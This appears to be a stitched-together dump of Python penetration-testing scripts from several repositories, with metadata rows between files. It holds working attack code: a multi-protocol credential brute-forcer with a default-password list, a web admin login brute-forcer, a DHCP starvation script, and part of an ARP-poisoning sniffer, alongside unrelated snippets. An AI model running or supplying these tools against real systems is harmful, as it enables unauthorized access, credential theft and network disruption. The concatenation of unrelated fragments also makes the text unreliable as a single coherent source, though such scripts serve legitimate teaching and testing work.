tos = storeobj[1]
total_length = storeobj[2]
identification = storeobj[3]
fragment_Offset = storeobj[4]
ttl = storeobj[5]
protocol = storeobj[6]
header_checksum = storeobj[7]
source_address = socket.inet_ntoa(storeobj[8])
destination_address = socket.inet_ntoa(storeobj[9])
data = {'Version': version,
"Tos": tos,
"Total Length": total_length,
"Identification": identification,
"Fragment": fragment_Offset,
"TTL": ttl,
"Protocol": protocol,
"Header CheckSum": header_checksum,
"Source Address": source_address,
"Destination Address": destination_address}
return data
def tcp_header(self, data):
storeobj = struct.unpack('!HHLLBBHHH', data)
source_port = storeobj[0]
destination_port = storeobj[1]
sequence_number = storeobj[2]
acknowledge_number = storeobj[3]
offset_reserved = storeobj[4]
tcp_flag = storeobj[5]
window = storeobj[6]
checksum = storeobj[7]
urgent_pointer = storeobj[8]
data = {"Source Port": source_port,
"Destination Port": destination_port,
"Sequence Number": sequence_number,
"Acknowledge Number": acknowledge_number,
"Offset & Reserved": offset_reserved,
"TCP Flag": tcp_flag,
"Window": window,
"CheckSum": checksum,
"Urgent Pointer": urgent_pointer
}
return data
def translatebyte(self, byte):
result = ""
flag = 0
for i in self.translationfile:
if byte in i:
i = i.split()
flag = 1
return i[0]
if flag == 0:
return "."
def translate(self, datas, src_ip, dst_ip):
result = ""
split_data = ""
item = 0
for i in datas:
split_data += i
item += 1
if item == 2:
split_data += " "
item = 0
for data in split_data.split():
add = self.translatebyte(data)
result += add
if self.raw:
print(f"\n[+]: Raw Network Traffic:")
print(f" {split_data}")
self.log(f"\n[(RAW)({src_ip})---->({dst_ip})]: {split_data}\n[(DECODED)({src_ip})---->({dst_ip})]: {result}")
return result
def log(self, item):
try:
file = open(self.logfile,"r")
contents = file.read()
file.close()
except:
pass
file = open(self.logfile,"w")
try:
file.write(contents)
except:
pass
file.write(item)
file.close()
def sniffing(self):
while True:
try:
if self.hastarget:
desired_target = False
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
if self.raw:
print(f"\n[+] Raw Packets Recieved: {pkt}")
if self.logger:
self.log(msg)
for i in self.eth_header(pkt[0][0:14]).items():
a, b = i
if desired_target:
print(f"[+] {a} | {b}")
if self.targ_mac in b:
msg = "\n[+] Ethernet Header:"
print(msg)
print(f"[+] {a} | {b}")
desired_target = True
else:
break
if self.logger:
self.log(f"\n[+] {a} | {b}")
if desired_target:
msg = "\n[+] IP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.ip_header(pkt[0][14:34]).items():
a, b = i
print(f"[+] {a} | {b}")
if "Source Address" in a.strip():
src_ip = b
if "Destination Address" in a.strip():
dst_ip = b
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] TCP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.tcp_header(pkt[0][34:54]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
if self.translat:
try:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
print(
"\n[+] Translation Of Network Traffic(gibberish most likely means encrypted traffic):")
print(" ", translation)
except Exception as e:
print("[+] Error with translation.")
else:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
else:
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
if self.raw:
print(f"\n[+] Raw Packets Recieved: {pkt}")
msg = "\n[+] Ethernet Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.eth_header(pkt[0][0:14]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] IP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.ip_header(pkt[0][14:34]).items():
a, b = i
print(f"[+] {a} | {b}")
if "Source Address" in a.strip():
src_ip = b
if "Destination Address" in a.strip():
dst_ip = b
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] TCP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.tcp_header(pkt[0][34:54]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
if self.translat:
try:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
print(
"\n[+] Translation Of Network Traffic(gibberish most likely means encrypted traffic):")
print(" ", translation)
except Exception as e:
print("[+] Error with translation.")
else:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
except KeyboardInterrupt:
print("[+] Stopping Script......\n")
self.arp_poison.restore_arp(self.arp_poison.gate_ip, self.arp_poison.gate_mac, self.arp_poison.targ_ip, self.arp_poison.targ_mac)
self.arp_poison.restore_arp(self.arp_poison.targ_ip, self.arp_poison.targ_mac, self.arp_poison.gate_ip, self.arp_poison.gate_mac)
break
except Exception as e:
self.log(f"\n[(ERROR]: {e}")
parser = OptionParse() | 43.91601 | 783 | 0.433731 |
PenetrationTestingScripts | #coding:utf-8
import getopt
import sys
import Queue
import threading
import socket
import urllib2
import time
import os
import re
import ftplib
import hashlib
import struct
import binascii
import telnetlib
import array
queue = Queue.Queue()
mutex = threading.Lock()
TIMEOUT = 10
I = 0
USER_DIC = {
"ftp":['www','admin','root','db','wwwroot','data','web','ftp'],
"mysql":['root'],
"mssql":['sa'],
"telnet":['administrator','admin','root','cisco'],
"postgresql":['postgres','admin'],
"redis":['null'],
"mongodb":['null'],
"memcached":['null'],
"elasticsearch":['null']
}
PASSWORD_DIC = ['123456','admin','root','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2016','{user}2015','{user}!','','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','fuckyou','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!','p@ssw0rd!','password1','r00t','tomcat','apache','system']
REGEX = [['ftp', '21', '^220.*?ftp|^220-|^220 Service|^220 FileZilla'], ['telnet', '23', '^\\xff[\\xfa-\\xfe]|^\\x54\\x65\\x6c|Telnet'],['mssql', '1433', ''], ['mysql', '3306', '^.\\0\\0\\0.*?mysql|^.\\0\\0\\0\\n|.*?MariaDB server'], ['postgresql', '5432', ''], ['redis', '6379', '-ERR|^\\$\\d+\\r\\nredis_version'], ['elasticsearch', '9200', ''], ['memcached', '11211', '^ERROR'], ['mongodb', '27017', '']]
class Crack():
def __init__(self,ip,port,server,timeout):
self.ip = ip
self.port = port
self.server = server
self.timeout = timeout
def run(self):
user_list = USER_DIC[self.server]
#print user_list
for user in user_list:
for pass_ in PASSWORD_DIC:
pass_ = str(pass_.replace('{user}', user))
k = getattr(self,self.server)
result = k(user,pass_)
if result:return result
def ftp(self,user,pass_):
try:
ftp=ftplib.FTP()
ftp.connect(self.ip,self.port)
ftp.login(user,pass_)
if user == 'ftp':return "anonymous"
return "username:%s,password:%s"%(user,pass_)
except Exception,e:
pass
def mysql(self,user,pass_):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((self.ip,int(self.port)))
packet = sock.recv(254)
plugin,scramble = self.get_scramble(packet)
if not scramble:return 3
auth_data = self.get_auth_data(user,pass_,scramble,plugin)
sock.send(auth_data)
result = sock.recv(1024)
if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00":
return "username:%s,password:%s" % (user,pass_)
def postgresql(self,user,pass_):#author:hos@YSRC
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((self.ip,int(self.port)))
packet_length = len(user) + 7 +len("\x03user database postgres application_name psql client_encoding UTF8 ")
p="%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c"%( 0,0,0,packet_length,0,0,0,0,user,0,0,0,0,0,0,0,0)
sock.send(p)
packet = sock.recv(1024)
psql_salt=[]
if packet[0]=='R':
a=str([packet[4]])
b=int(a[4:6],16)
authentication_type=str([packet[8]])
c=int(authentication_type[4:6],16)
if c==5:psql_salt=packet[9:]
else:return 3
buf=[]
salt = psql_salt
lmd5= self.make_response(buf,user,pass_,salt)
packet_length1=len(lmd5)+5+len('p')
pp='p%c%c%c%c%s%c'%(0,0,0,packet_length1 - 1,lmd5,0)
sock.send(pp)
packet1 = sock.recv(1024)
if packet1[0] == "R":
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
def redis(self,user,pass_):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("INFO\r\n")
result = s.recv(1024)
if "redis_version" in result:
return "unauthorized"
elif "Authentication" in result:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("AUTH %s\r\n"%(pass_))
result = s.recv(1024)
if '+OK' in result:
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
def mssql(self,user,pass_):#author:hos@YSRC
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.ip,self.port))
hh=binascii.b2a_hex(self.ip)
husername=binascii.b2a_hex(user)
lusername=len(user)
lpassword=len(pass_)
ladd=len(self.ip)+len(str(self.port))+1
hladd=hex(ladd).replace('0x','')
hpwd=binascii.b2a_hex(pass_)
pp=binascii.b2a_hex(str(self.port))
address=hh+'3a'+pp
hhost= binascii.b2a_hex(self.ip)
data="0200020000000000123456789000000000000000000000000000000000000000000000000000ZZ5440000000000000000000000000000000000000000000000000000000000X3360000000000000000000000000000000000000000000000000000000000Y373933340000000000000000000000000000000000000000000000000000040301060a09010000000002000000000070796d7373716c000000000000000000000000000000000000000000000007123456789000000000000000000000000000000000000000000000000000ZZ3360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Y0402000044422d4c6962726172790a00000000000d1175735f656e676c69736800000000000000000000000000000201004c000000000000000000000a000000000000000000000000000069736f5f31000000000000000000000000000000000000000000000000000501353132000000030000000000000000"
data1=data.replace(data[16:16+len(address)],address)
data2=data1.replace(data1[78:78+len(husername)],husername)
data3=data2.replace(data2[140:140+len(hpwd)],hpwd)
if lusername>=16:
data4=data3.replace('0X',str(hex(lusername)).replace('0x',''))
else:
data4=data3.replace('X',str(hex(lusername)).replace('0x',''))
if lpassword>=16:
data5=data4.replace('0Y',str(hex(lpassword)).replace('0x',''))
else:
data5=data4.replace('Y',str(hex(lpassword)).replace('0x',''))
hladd = hex(ladd).replace('0x', '')
data6=data5.replace('ZZ',str(hladd))
data7=binascii.a2b_hex(data6)
sock.send(data7)
packet=sock.recv(1024)
if 'master' in packet:
return "username:%s,password:%s" % (user,pass_)
except:
return 3
def mongodb(self,user,pass_):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
s.send(data)
result = s.recv(1024)
if "ismaster" in result:
getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
s.send(getlog_data)
result = s.recv(1024)
if "totalLinesWritten" in result:
return "unauthorized"
else:return 3
except Exception,e:
return 3
def memcached(self,user,pass_):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("stats\r\n")
result = s.recv(1024)
if "version" in result:
return "unauthorized"
def elasticsearch(self,user,pass_):
url = "http://"+self.ip+":"+str(self.port)+"/_cat"
data = urllib2.urlopen(url).read()
if '/_cat/master' in data:
return "unauthorized"
else:
return 3
def telnet(self,user,pass_):
try:
tn = telnetlib.Telnet(self.ip,self.port,self.timeout)
#tn.set_debuglevel(3)
time.sleep(0.5)
os = tn.read_some()
except Exception ,e:
return 3
user_match="(?i)(login|user|username)"
pass_match='(?i)(password|pass)'
login_match='#|\$|>'
if re.search(user_match,os):
try:
tn.write(str(user)+'\r\n')
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
pass
else:
try:
info=tn.read_until(user_match,timeout=2)
except Exception,e:
return 3
if re.search(user_match,info):
try:
tn.write(str(user)+'\r\n')
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
elif re.search(pass_match,info):
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "password:%s" % (pass_)
def get_hash(self,password, scramble):
hash_stage1 = hashlib.sha1(password).digest()
hash_stage2 = hashlib.sha1(hash_stage1).digest()
to = hashlib.sha1(scramble+hash_stage2).digest()
reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)]
hash = struct.pack('20B', *reply)
return hash
def get_scramble(self,packet):
scramble,plugin = '',''
try:
tmp = packet[15:]
m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp)
if len(m)>3:del m[0]
scramble = m[0] + m[1]
except:
return '',''
try:
plugin = m[2]
except:
pass
return plugin,scramble
def get_auth_data(self,user,password,scramble,plugin):
user_hex = binascii.b2a_hex(user)
pass_hex = binascii.b2a_hex(self.get_hash(password,scramble))
data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex
if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634"
len_hex = hex(len(data)/2).replace("0x","")
auth_data = len_hex + "000001" +data
return binascii.a2b_hex(auth_data)
def make_response(self,buf,username,password,salt):
pu=hashlib.md5(password+username).hexdigest()
buf=hashlib.md5(pu+salt).hexdigest()
return 'md5'+buf
class SendPingThr(threading.Thread):
def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3):
threading.Thread.__init__(self)
self.Sock = icmpSocket
self.ipPool = ipPool
self.packet = icmpPacket
self.timeout = timeout
self.Sock.settimeout(timeout + 1)
def run(self):
time.sleep(0.01)
for ip in self.ipPool:
try:
self.Sock.sendto(self.packet, (ip, 0))
except socket.timeout:
break
time.sleep(self.timeout)
class Nscan:
def __init__(self, timeout=3):
self.timeout = timeout
self.__data = struct.pack('d', time.time())
self.__id = os.getpid()
if self.__id >= 65535:self.__id = 65534
@property
def __icmpSocket(self):
Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
return Sock
def __inCksum(self, packet):
if len(packet) & 1:
packet = packet + '\0'
words = array.array('h', packet)
sum = 0
for word in words:
sum += (word & 0xffff)
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
return (~sum) & 0xffff
@property
def __icmpPacket(self):
header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)
packet = header + self.__data
chkSum = self.__inCksum(packet)
header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
return header + self.__data
def mPing(self, ipPool):
Sock = self.__icmpSocket
Sock.settimeout(self.timeout)
packet = self.__icmpPacket
recvFroms = set()
sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
sendThr.start()
while True:
try:
ac_ip = Sock.recvfrom(1024)[1][0]
if ac_ip not in recvFroms:
log("active",ac_ip,0,None)
recvFroms.add(ac_ip)
except Exception:
pass
finally:
if not sendThr.isAlive():
break
return recvFroms & ipPool
def get_ac_ip(ip_list):
try:
s = Nscan()
ipPool = set(ip_list)
return s.mPing(ipPool)
except Exception,e:
print 'The current user permissions unable to send icmp packets'
return ip_list
class ThreadNum(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
try:
if queue.empty():break
queue_task = self.queue.get()
except:
break
try:
task_type,task_host,task_port = queue_task.split(":")
if task_type == 'portscan':
data = scan_port(task_host,task_port)
if data:
server_name = server_discern(task_host,task_port,data)
if server_name:
log('discern',task_host,task_port,server_name)
queue.put(":".join([server_name,task_host,task_port]))
else:
result = pass_crack(task_type,task_host,task_port)
if result and result !=3:log(task_type,task_host,task_port,result)
except Exception,e:
continue
def scan_port(host,port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((str(host),int(port)))
log('portscan',host,port)
except Exception,e:
return False
try:
data = sock.recv(512)
if len(data) > 2:
return data
else:
sock.send('a\n\n')
data = sock.recv(512)
sock.close()
if len(data) > 2:
return data
else:
return 'NULL'
except Exception,e:
sock.close()
return 'NULL'
def log(scan_type,host,port,info=''):
mutex.acquire()
time_str = time.strftime('%X', time.localtime( time.time()))
if scan_type == 'portscan':
print "[%s] %s:%d open"%(time_str,host,int(port))
elif scan_type == 'discern':
print "[%s] %s:%d is %s"%(time_str,host,int(port),info)
elif scan_type == 'active':
print "[%s] %s active" % (time_str, host)
elif info:
log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info)
print log
log_file = open('result.log','a')
log_file.write(log+"\r\n")
log_file.close()
mutex.release()
def server_discern(host,port,data):
for mark_info in REGEX:
try:
name,default_port,reg = mark_info
if reg and data <> 'NULL':
matchObj = re.search(reg,data,re.I|re.M)
if matchObj:
return name
elif int(default_port) == int(port):
return name
except Exception,e:
#print e
continue
def pass_crack(server_type,host,port):
m = Crack(host,port,server_type,TIMEOUT)
return m.run()
def get_password_dic(path):
pass_list = []
try:
file_ = open(path,'r')
for password in file_:
pass_list.append(password.strip())
file_.close()
return pass_list
except:
return 'read dic error'
def get_ip_list(ip):
ip_list = []
iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
if '-' in ip:
ip_range = ip.split('-')
ip_start = long(iptonum(ip_range[0]))
ip_end = long(iptonum(ip_range[1]))
ip_count = ip_end - ip_start
if ip_count >= 0 and ip_count <= 65536:
for ip_num in range(ip_start,ip_end+1):
ip_list.append(numtoip(ip_num))
else:
print '-h wrong format'
elif '.ini' in ip:
ip_config = open(ip,'r')
for ip in ip_config:
ip_list.extend(get_ip_list(ip.strip()))
ip_config.close()
else:
ip_split=ip.split('.')
net = len(ip_split)
if net == 2:
for b in range(1,255):
for c in range(1,255):
ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
ip_list.append(ip)
elif net == 3:
for c in range(1,255):
ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
ip_list.append(ip)
elif net ==4:
ip_list.append(ip)
else:
print "-h wrong format"
return ip_list
def t_join(m_count):
tmp_count = 0
i = 0
if I < m_count:
count = len(ip_list) + 1
else:
count = m_count
while True:
time.sleep(4)
ac_count = threading.activeCount()
#print ac_count,count
if ac_count < count and ac_count == tmp_count:
i+=1
else:
i=0
tmp_count = ac_count
#print ac_count,queue.qsize()
if (queue.empty() and threading.activeCount() <= 1) or i > 5:
break
def put_queue(ip_list,port_list):
for ip in ip_list:
for port in port_list:
queue.put(":".join(['portscan',ip,port]))
if __name__=="__main__":
msg = '''
Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n]
'''
if len(sys.argv) < 2:
print msg
try:
options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n")
ip = ''
port = '21,23,1433,3306,5432,6379,9200,11211,27017'
m_count = 100
ping = True
for opt,arg in options:
if opt == '-h':
ip = arg
elif opt == '-p':
port = arg
elif opt == '-m':
m_count = int(arg)
elif opt == '-t':
TIMEOUT = int(arg)
elif opt == '-n':
ping = False
elif opt == '-d':
PASSWORD_DIC = get_password_dic(arg)
socket.setdefaulttimeout(TIMEOUT)
if ip:
ip_list = get_ip_list(ip)
if ping:ip_list = get_ac_ip(ip_list)
port_list = port.split(',')
for ip_str in ip_list:
for port_int in port_list:
I+=1
queue.put(':'.join(['portscan',ip_str,port_int]))
for i in range(m_count):
t = ThreadNum(queue)
t.setDaemon(True)
t.start()
t_join(m_count)
except Exception,e:
print msg
| 39.358238 | 1,195 | 0.548799 |
Hands-On-Penetration-Testing-with-Python | a=44
b=33
if a > b:
print("a is greater")
| 7.8 | 22 | 0.581395 |
Python-Penetration-Testing-Cookbook | """Summary.
Attributes:
ip (list): Description
mac (list): Description
"""
from scapy.all import *
from time import sleep
from threading import Thread
mac = [""]
ip = []
def callback_dhcp_handle(pkt):
"""Summary.
Args:
pkt (TYPE): Description
"""
if pkt.haslayer(DHCP):
if pkt[DHCP].options[0][1] == 5 and pkt[IP].dst != "192.168.1.38":
ip.append(pkt[IP].dst)
print(str(pkt[IP].dst) + " registered")
elif pkt[DHCP].options[0][1] == 6:
print("NAK received")
def sniff_udp_packets():
"""Summary."""
sniff(filter="udp and (port 67 or port 68)",
prn=callback_dhcp_handle,
store=0)
def occupy_ip():
"""Summary."""
for i in range(250):
requested_addr = "192.168.1." + str(2 + i)
if requested_addr in ip:
continue
src_mac = ""
while src_mac in mac:
src_mac = RandMAC()
mac.append(src_mac)
pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000)
pkt /= DHCP(options=[("message-type", "request"),
("requested_addr", requested_addr),
("server_id", "192.168.1.1"),
"end"])
sendp(pkt)
pkt.show()
print("Trying to occupy " + requested_addr)
sleep(0.2) # interval to avoid congestion and packet loss
def main():
"""Summary."""
thread = Thread(target=sniff_udp_packets)
thread.start()
print("Starting DHCP starvation...")
# Keep starving until all 100 targets are registered
# 100~200 excepts 107 = 100
while len(ip) < 100:
occupy_ip()
print("Targeted IP address starved")
main()
| 24.36 | 74 | 0.535508 |
PenTestScripts | #!/usr/bin/env python
# This script implements basic controls for a Boxee xbmc device
# Play both pauses and plays a video.
# Everything else should be straightforward
import argparse
import sys
import urllib2
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="Boxee_Control is a script that lets you control Boxee and XBMC devides. Supported commands are Play/Pause, OK/Enter, Stop, Left, Right, Down, Up.")
parser.add_argument(
"--ip", metavar='192.168.199.23',
help="IP address of boxee/xbmc device.")
parser.add_argument(
"--port", metavar='8800', default='8800',
help="Specify port value, default is 8800.")
parser.add_argument(
"--command", '-c', metavar="Play",
help="Command to issue. Supported Commands: Play, Pause, Stop, Left, Right, Down, Up, Ok, Enter, Rewind, Fastforward.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args
if __name__ == '__main__':
# Begin parsing command line options
cli_args = cli_parser()
xbmc_system = "http://" + cli_args.ip + ":" + cli_args.port
if cli_args.command.lower().strip() == "play" or cli_args.command.lower().strip() == "pause":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Pause()'
elif cli_args.command.lower() == "stop":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Stop()'
elif cli_args.command.lower() == "ok" or cli_args.command.lower() == "enter":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF00D)'
elif cli_args.command.lower() == "right":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF027)'
elif cli_args.command.lower() == "left":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF025)'
elif cli_args.command.lower() == "down":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF028)'
elif cli_args.command.lower() == "up":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF026)'
elif cli_args.command.lower() == "rewind":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Action(78)'
elif cli_args.command.lower() == "fastforward":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Action(77)'
else:
print "You didn't specify a supported command. Please only use:"
print "play, pause, ok, enter, up, down, left, right, rewind, or fastworward"
sys.exit()
full_url = xbmc_system + xbmc_command
# Send the command
urllib2.urlopen(full_url)
| 36.680556 | 168 | 0.637537 |
cybersecurity-penetration-testing | import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# target specific settings
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field= "username"
password_field= "passwd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
for name,value in attrs:
if name == "name":
tag_name = value
if name == "value":
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read()
print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."
def build_wordlist(wordlist_file):
# read in the word list
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
| 26.166667 | 93 | 0.518271 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Mastering-Machine-Learning-for-Penetration-Testing | import numpy as np
from sklearn import *
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
training_data = np.genfromtxt('dataset.csv', delimiter=',', dtype=np.int32)
inputs = training_data[:,:-1]
outputs = training_data[:, -1]
training_inputs = inputs[:2000]
training_outputs = outputs[:2000]
testing_inputs = inputs[2000:]
testing_outputs = outputs[2000:]
classifier = LogisticRegression()
classifier.fit(training_inputs, training_outputs)
predictions = classifier.predict(testing_inputs)
accuracy = 100.0 * accuracy_score(testing_outputs, predictions)
print ("The accuracy of your Logistic Regression on testing data is: " + str(accuracy))
| 27 | 87 | 0.763948 |
Python-Penetration-Testing-for-Developers | import shelve
def create():
print "This only for One key "
s = shelve.open("mohit.xss",writeback=True)
s['xss']= []
def update():
s = shelve.open("mohit.xss",writeback=True)
val1 = int(raw_input("Enter the number of values "))
for x in range(val1):
val = raw_input("\n Enter the value\t")
(s['xss']).append(val)
s.sync()
s.close()
def retrieve():
r = shelve.open("mohit.xss",writeback=True)
for key in r:
print "*"*20
print key
print r[key]
print "Total Number ", len(r['xss'])
r.close()
while (True):
print "Press"
print " C for Create, \t U for Update,\t R for retrieve"
print " E for exit"
print "*"*40
c=raw_input("Enter \t")
if (c=='C' or c=='c'):
create()
elif(c=='U' or c=='u'):
update()
elif(c=='R' or c=='r'):
retrieve()
elif(c=='E' or c=='e'):
exit()
else:
print "\t Wrong Input" | 18.340909 | 60 | 0.590588 |
cybersecurity-penetration-testing | #!/usr/bin/python
import sys
import netaddr
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import sr1, IP, ICMP
PING_TIMEOUT = 3
IFACE='eth0'
if __name__ == '__main__':
print '\tQuick Ping Sweep\n'
if len(sys.argv) != 2:
print '[?] Usage: pingsweep <network>'
sys.exit(0)
net = sys.argv[1]
print 'Input network:', net
responding = []
network = netaddr.IPNetwork(net)
for ip in network:
if ip == network.network or ip == network.broadcast:
continue
# Send & wait for response for the ICMP Echo Request packet
reply = sr1( IP(dst=str(ip)) / ICMP(), timeout=PING_TIMEOUT, iface=IFACE, verbose=0 )
if not reply:
continue
if int(reply.getlayer(ICMP).type) == 0 and int(reply.getlayer(ICMP).code) == 0:
print ip, ': Host is responding to ICMP Echo Requests.'
responding.append(ip)
print '[+] Spotted {} ICMP Echo Requests.'.format(len(responding)) | 25.538462 | 93 | 0.610251 |
PenetrationTestingScripts | """Utility functions for HTTP header value parsing and construction.
Copyright 1997-1998, Gisle Aas
Copyright 2002-2006, John J. Lee
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import os, re
from types import StringType
from types import UnicodeType
